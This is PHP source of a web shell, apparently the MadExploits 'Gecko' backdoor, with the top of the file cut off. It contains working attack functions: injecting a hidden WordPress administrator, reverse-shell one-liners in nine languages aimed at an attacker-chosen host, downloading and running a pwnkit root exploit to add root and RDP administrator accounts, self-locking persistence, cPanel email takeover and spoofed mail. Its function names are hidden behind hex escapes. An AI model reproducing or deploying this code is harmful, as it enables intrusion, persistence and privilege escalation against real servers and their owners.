Code Editor : = unx($_GET['f']); ?>
connect_error) {
failed();
die("Error Cug : " . $conn->connect_error);
}
$sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES ('$wp_user', '$wp_pass', 'MadExploits', '', '', NOW(), '', 0, 'MadExploits')";
$sqltakeuserid = "SELECT ID FROM wp_users WHERE user_login = '$wp_user'";
if ($conn->query($sql) === TRUE && $conn->query($sqltakeuserid)) {
$result = $conn->query($sqltakeuserid);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
$user_id = $row["ID"];
$sqlusermeta = "INSERT INTO wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES ('', $user_id, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')";
if ($conn->query($sqlusermeta) === TRUE) {
Success();
} else {
echo "Error: " . $sqlusermeta . "\n" . $conn->error;
}
} else {
echo "User tidak ditemukan.\n";
}
Success();
} else {
echo "Error: " . $sql . "\n" . $conn->error;
}
$conn->close();
}
if (isset($_GET['unlockshell'])) {
if (cmd("killall -9 php") && cmd("pkill -9 php")) {
success();
} else {
failed();
}
}
if (isset($_POST['submit-bc'])) {
$HostServer = $_POST['backconnect-host'];
$PortServer = $_POST['backconnect-port'];
if ($_POST['gecko-bc'] == "perl") {
echo cmd('perl -e \'use Socket;$i="' . $HostServer . '";$p=' . $PortServer . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");' . $fungsi[16] . '("/bin/sh -i");};\'');
} else if ($_POST['gecko-bc'] == "python") {
echo cmd('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' . $HostServer . '",' . $PortServer . '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
} else if ($_POST['gecko-bc'] == "ruby") {
echo cmd('ruby -rsocket -e\'f=TCPSocket.open("' . $HostServer . '",' . $PortServer . ').to_i;' . $fungsi[16] . ' sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\'');
} else if ($_POST['gecko-bc'] == "bash") {
echo cmd('bash -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1');
} else if ($_POST['gecko-bc'] == "php") {
echo cmd('php -r \'$sock=fsockopen("' . $HostServer . '",' . $PortServer . ');' . $fungsi[16] . '("/bin/sh -i <&3 >&3 2>&3");\'');
} else if ($_POST['gecko-bc'] == "nc") {
echo cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ' . $HostServer . ' ' . $PortServer . ' >/tmp/f');
} else if ($_POST['gecko-bc'] == "sh") {
echo cmd('sh -i >& /dev/tcp/' . $HostServer . '/' . $PortServer . ' 0>&1');
} else if ($_POST['gecko-bc'] == "xterm") {
echo cmd('xterm -display ' . $HostServer . ':' . $PortServer);
} else if ($_POST['gecko-bc'] == "golang") {
echo cmd('echo \'package main;import"os/' . $fungsi[16] . '";import"net";func main(){c,_:=net.Dial("tcp","' . $HostServer . ':' . $PortServer . '");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go');
}
}
if (isset($_GET['lockshell'])) {
$curFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));
$TmpNames = $fungsi[31]();
if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text'))) {
cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text'));
cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-handler'));
}
mkdir($TmpNames . "/.sessions");
cmd("cp $curFile " . $TmpNames . "/.sessions/." . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text'));
chmod($curFile, 0444);
$handler = '
/dev/null 2>/dev/null &');
success();
} else {
failed();
}
}
if (isset($_POST['gecko-up-submit'])) {
$namaFilenya = $_FILES['gecko-upload']['name'];
$tmpName = $_FILES['gecko-upload']['tmp_name'];
if ($fungsi[29]($tmpName, $fungsi[0]() . "/" . $namaFilenya)) {
success();
} else {
failed();
}
}
if (isset($_GET['destroy'])) {
$DOC_ROOT = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];
$CurrentFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));
if ($fungsi[4]($DOC_ROOT)) {
$htaccess = '
Deny from all
Allow from all
Allow from all
';
$put_htt = $fungsi[28]($DOC_ROOT . "/.htaccess", $htaccess);
if ($put_htt) {
success();
} else {
failed();
}
} else {
failed();
}
}
if (isset($_POST['save-editor'])) {
$save = $fungsi[28]($fungsi[0]() . "/" . unx($_GET['f']), $_POST['code-editor']);
if ($save) {
success();
} else {
failed();
}
}
if (isset($_GET['adminer'])) {
$URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70";
if (!$fungsi[3]('adminer.php')) {
$fungsi[28]("adminer.php", $fungsi[11]($URL));
echo '
';
}
}
if ($_GET['terminal'] == "root") {
if (!$fungsi[3]('pwnkit') && $fungsi[4]($fungsi[0]())) {
$fungsi[28]("pwnkit", $fungsi[11]("https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit"));
cmd('chmod +x pwnkit');
echo cmd('./pwnkit "id" > .mad-root');
echo '
';
}
}
if (isset($_POST['submit-action'])) {
$items = $_POST['check'];
if ($_POST['gecko-select'] == "delete") {
foreach ($items as $it) {
$repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path
$fd = $repl . "/" . $it;
if (is_dir($fd) || is_file($fd)) {
$rmdir = unlinkDir($fd);
$rmfile = $fungsi[24]($fd);
if ($rmdir || $rmfile) {
success();
} else if ($rmdir && $rmfile) {
success();
} else {
failed();
}
}
}
} else if ($_POST['gecko-select'] == 'unzip') {
foreach ($items as $it) {
$repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path
$fd = $repl . "/" . $it;
if (ExtractArchive($fd, $repl . '/') == true) {
success();
} else {
failed();
}
}
} else if ($_POST['gecko-select'] == 'zip') {
foreach ($items as $it) {
$repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path
$fd = $repl . "/" . $it;
if ($fungsi[3]($fd)) {
compressToZip($fd, pathinfo($fd, PATHINFO_FILENAME) . ".zip");
}
}
}
}
if (isset($_POST['submit'])) {
if ($_POST['resetcp'] == true) {
$emailCp = $_POST['resetcp'];
$path0cp = dirname($_SERVER['DOCUMENT_ROOT']);
$pathcp = $path0cp . "/.cpanel/contactinfo";
$contactinfo = '
"email" : "' . $emailCp . '"
';
if ($fungsi[3]($pathcp)) {
$fungsi[28]($pathcp, $contactinfo);
echo '
';
} else {
failed();
}
}
if ($_POST['create_folder'] == true) {
$NamaFolder = $fungsi[12]($_POST['create_folder']);
if ($NamaFolder) {
success();
} else {
failed();
}
} else if ($_POST['create_file'] == true) {
$namaFile = $fungsi[13]($_POST['create_file']);
if ($namaFile) {
success();
} else {
failed();
}
} else if ($_POST['renameFile'] == true) {
$renameFile = $fungsi[15](unx($_GET['re']), $_POST['renameFile']);
if ($renameFile) {
success();
} else {
failed();
}
} else if ($_POST['chFile']) {
$chFiles = $fungsi[30](unx($_GET['ch']), $_POST['chFile']);
if ($chFiles) {
success();
} else {
failed();
}
} else if (isset($_POST['add-username']) && isset($_POST['add-password'])) {
if (!$fungsi[3]('pwnkit')) {
cmd('wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit');
cmd('chmod +x pwnkit');
cmd('./pwnkit "id" > .mad-root');
echo '
';
} else if ($fungsi[3]('.mad-root')) {
$response = $fungsi[11]('.mad-root');
$r_text = explode(" ", $response);
if ($r_text[0] == "uid=0(root)") {
$username = $_POST['add-username'];
$password = $_POST['add-password'];
cmd('./pwnkit "useradd ' . $username . ' ; echo -e "' . $password . '\n' . $password . '" | passwd ' . $username . '"');
} else {
echo '
';
}
}
} else if ($_POST['lockfile'] == true) {
$flesName = $_POST['lockfile'];
$TmpNames = $fungsi[31]();
if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . remove_dot($flesName) . '-text')) {
cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file'));
cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler'));
}
mkdir($TmpNames . "/.sessions");
cmd("cp $flesName " . $TmpNames . "/.sessions/." . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file'));
cmd("chmod 444 " . $flesName);
$handler = '
/dev/null 2>/dev/null &');
success();
} else {
failed();
}
} else if ($_POST['add-rdp'] == True) {
$userRDP = $_POST['add-rdp'];
$passRDP = $_POST['add-rdp-pass'];
if (stristr(PHP_OS, "WIN")) {
$procRDP = cmd("net user " . $userRDP . " " . $passRDP . " /add");
if ($procRDP) {
cmd("net localgroup administrators " . $userRDP . " /add");
success();
} else {
failed();
}
} else {
failed();
}
} else if ($_POST['mail-from-smtp'] == True) {
$emailFrom = $_POST['mail-from-smtp'];
$emailTo = $_POST['mail-to-smtp'];
$emailSubject = $_POST['mailto-subject'];
$messageMail = $_POST['message-smtp'];
$headersMail = 'From: ' . $emailFrom . '' . "\r\n" .
'Reply-To: ' . $emailFrom . '' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
$procMailSmTp = mail($emailTo, $emailSubject, $messageMail, $headersMail);
if ($procMailSmTp) {
success();
} else {
failed();
}
}
}
if ($_GET['response'] == "success") {
echo "";
} else if ($_GET['response'] == "failed") {
echo "";
}
function success()
{
echo '
';
}
function failed()
{
echo '
';
}
function formatSize($bytes)
{
$types = array('
B', '
KB', '
MB', '
GB', '
TB');
for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++);
return (round($bytes, 2) . " " . $types[$i]);
}
function hx($n)
{
$y = '';
for ($i = 0; $i < strlen($n); $i++) {
$y .= dechex(ord($n[$i]));
}
return $y;
}
function unx($y)
{
$n = '';
for ($i = 0; $i < strlen($y) - 1; $i += 2) {
$n .= chr(hexdec($y[$i] . $y[$i + 1]));
}
return $n;
}
function suggest_exploit()
{
$uname = $GLOBALS['fungsi'][8]();
$xplod = explode(" ", $uname);
$xpld = explode("-", $xplod[2]);
$pl = explode(".", $xpld[0]);
return $pl[0] . "." . $pl[1] . "." . $pl[2];
}
function s()
{
$d0mains = @$GLOBALS['fungsi'][7]("/etc/named.conf", false);
if (!$d0mains) {
$dom = "
Cant Read [ /etc/named.conf ]";
$GLOBALS["need_to_update_header"] = "true";
} else {
$count = 0;
foreach ($d0mains as $d0main) {
if (@strstr($d0main, "zone")) {
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
flush();
$count++;
}
}
}
$dom = "$count Domain";
}
return $dom;
}
function cmd($in, $re = false)
{
$out = '';
try {
if ($re) $in = $in . " 2>&1";
if (function_exists("\x65\x78\x65\x63")) {
@$GLOBALS['fungsi'][16]($in, $out);
$out = @join("\n", $out);
} elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) {
ob_start();
@$GLOBALS['fungsi'][17]($in);
$out = ob_get_clean();
} elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) {
ob_start();
@$GLOBALS['fungsi'][18]($in);
$out = ob_get_clean();
} elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) {
$out = $GLOBALS['fungsi'][19]($in);
} elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) {
if (is_resource($f = @$GLOBALS['fungsi'][20]($in, "r"))) {
$out = "";
while (!@feof($f))
$out .= fread($f, 1024);
$GLOBALS['fungsi'][21]($f);
}
} elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) {
$pipes = array();
$process = @$GLOBALS['fungsi'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
$out = @$GLOBALS['fungsi'][22]($pipes[1]);
}
} catch (Exception $e) {
}
return $out;
}
function winpwd()
{
return str_replace("\\", "/", $GLOBALS['fungsi'][0]());
}
function compressToZip($sourceFile, $zipFilename)
{
$zip = new ZipArchive();
if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) {
$zip->addFile($sourceFile, basename($sourceFile));
$zip->close();
success();
} else {
failed();
}
}
function remove_slash($val)
{
$tex = str_replace("/", "", $val);
$tex1 = str_replace(":", "", $tex);
$tex2 = str_replace("_", "", $tex1);
$tex3 = str_replace(" ", "", $tex2);
$tex4 = str_replace(".", "", $tex3);
return $tex4;
}
function unlinkDir($dir)
{
$dirs = array($dir);
$files = array();
for ($i = 0;; $i++) {
if (isset($dirs[$i]))
$dir = $dirs[$i];
else
break;
if ($openDir = opendir($dir)) {
while ($readDir = @readdir($openDir)) {
if ($readDir != "." && $readDir != "..") {
if ($GLOBALS['fungsi'][2]($dir . "/" . $readDir)) {
$dirs[] = $dir . "/" . $readDir;
} else {
$files[] = $dir . "/" . $readDir;
}
}
}
}
}
foreach ($files as $file) {
$GLOBALS['fungsi'][24]($file);
}
$dirs = array_reverse($dirs);
foreach ($dirs as $dir) {
$GLOBALS['fungsi'][25]($dir);
}
}
function remove_dot($file)
{
$FILES = $file;
$pch = explode(".", $FILES);
return $pch[0];
}
function windowsDriver()
{
$winArr = [
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z'
];
foreach ($winArr as $winNum => $winVal) {
if (is_dir($winVal . ":/")) {
echo "
[ " . $winVal . " ] ";
}
}
}
function namaPanjang($value)
{
$namaNya = $value;
$extensi = pathinfo($value, PATHINFO_EXTENSION);
if (strlen($namaNya) > 30) {
return substr($namaNya, 0, 30) . "...";
} else {
return $value;
}
}
function extractArchive($archiveFilename, $extractPath)
{
$zip = new ZipArchive();
if ($zip->open($archiveFilename) === TRUE) {
$zip->extractTo($extractPath);
$zip->close();
return true;
} else {
return false;
}
}
function perms($file)
{
$perms = $GLOBALS['fungsi'][6]($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
?>